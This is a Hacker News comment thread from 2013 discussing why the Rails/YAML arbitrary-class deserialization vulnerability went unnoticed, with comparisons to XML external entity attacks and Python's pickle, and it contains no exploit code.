What is crazy to me is everyone *has* had this bug, and learned from it, and fix...

alexch · on Jan 31, 2013

My analysis: layering. YAML doesn't in itself execute untrusted code, but it has a bunch of semi-experimental features most people don't know about or use, and one of those features (deserializing arbitrary classes) has a side effect that sets values on certain other classes -- not written by the people who wrote the YAML parser -- that then, often later on in their lifecycle, execute this untrusted code. I'm not saying this as an excuse -- I have long mistrusted YAML's blasé complexity, not to mention Rails' anarchic pass-HTTP-params-directly-into-the-DB pattern -- but as an explanation of how they missed it.

Also, more than other communities, Ruby has a cultural gap between the people developing the language and core libraries and the people using it to write web apps and frameworks.

Here's two good technical writeups of the exploit as it applies to Rails apps: http://blog.codeclimate.com/blog/2013/01/10/rails-remote-cod... http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html

NelsonMinar · on Jan 31, 2013

Thanks, the complexity and layering are presumably part of the problem. This reminds me of the old XML External Entity attack that keeps coming back because developers don't realize you can coerce most XML parsers to open arbitrary URLs. That's been affecting products that parse XML for 10 years now and still hasn't stopped and leads to ugly security holes (like in Adobe Reader). The root cause is XML is far too complex and has surprising features, in this case, entity definition by URL.

steveklabnik · on Jan 31, 2013

The initial code for Rubygems was written at Rubyconf '06, if I remember correctly. The Ruby world was very, very different back then. Same with Rails, originally released in '05.

My point is that it's 'taken so long' because all this code is stuff that was written in a totally different time and place. And then was built on top of, after years and years and years.

Now that it _is_ being examined, that's why you see some many advisories. This is a good thing, not a bad one! It's all being looked through and taken care of.

jrochkind1 · on Jan 31, 2013

Because it was not obvious that "allowing de-serialization to objects of arbitrary classes specified in the serialized representation" was the same thing as "treating input as code to execute"

And then, as someone else said, becuase of layering. The next downstream user using YAML might not have even realized that YAML had this feature, on top of not realizing the danger of this feature. And then someone else downstream of THAT library, etc.

Maybe it _should_ have been obvious, but it wasn't, as evidenced, as you say, by all the people who have done it before. After the FIRST time it was discovered, it should have been obvious, why did it happen even a second?

In part, becuase for whatever reason, none of those exploits got the (negative) publicity that the rails/yaml one is getting. Hopefully it (the dangers of serialization formats allowing arbitrary class/type de-serialization) WILL become obvious to competent developers NOW, but it was not before.

20 years ago, you could write code thinking that giving untrusted user input to it was a _special case_. "Well, I guess, now that you mention it, if you give untrusted input that may have been constructed by an attacker to this function it would be dangerous, but why/how would anyone do that?" Things have changed. There's a lot more code where you should be assuming that passing untrusted input to it will be done, unless you specifically and loudly document not to. But we're still using a lot of code written under the assumptions of 20 years ago -- assumptions that were not neccesarily wrong cost/benefit analyses 20 years ago. And yeah, some people are still WRITING code under the security assumptions of 20 years ago too, oops.

At the same time, we have a LOT MORE code _sharing_ than we had 20 years ago. (internet open source has changed the way software is written, drastically) And ruby community is especially 'advanced' at code sharing, using each other's code as dependencies in a complex multi-generation dependency graph. That greatly increases the danger of unexpected interactions of features creating security exploits that would not have been predicted by looking at any part in isolation. But we couldn't accomplish what we have all accomplished without using other people's open source code as more-or-less black box building blocks for our own, we can't do a full security audit of all of our dependencies (and our dependencies' dependencies etc).

Spakman · on Jan 31, 2013

Presumably they missed it the same way the developers of those other things you listed did. I can only assume they didn't know about these other problems when developing their YAML parsers.

Of course, you could argue that developers should always be thinking about and searching for security related issues in whatever field they're working in, but that doesn't appear to be the norm at the moment.

rmc · on Feb 1, 2013

Python has this bug; you can't unpickle untrusted input

I thought you could unpickle untrusted input in Python? Sure there's a great big red warning message on the documentation, and hence it's currently rare for people to do it, but it is technically allowed, right?

gthbriem · on Feb 1, 2013

Sure, this is “can't” in the sense “must not”.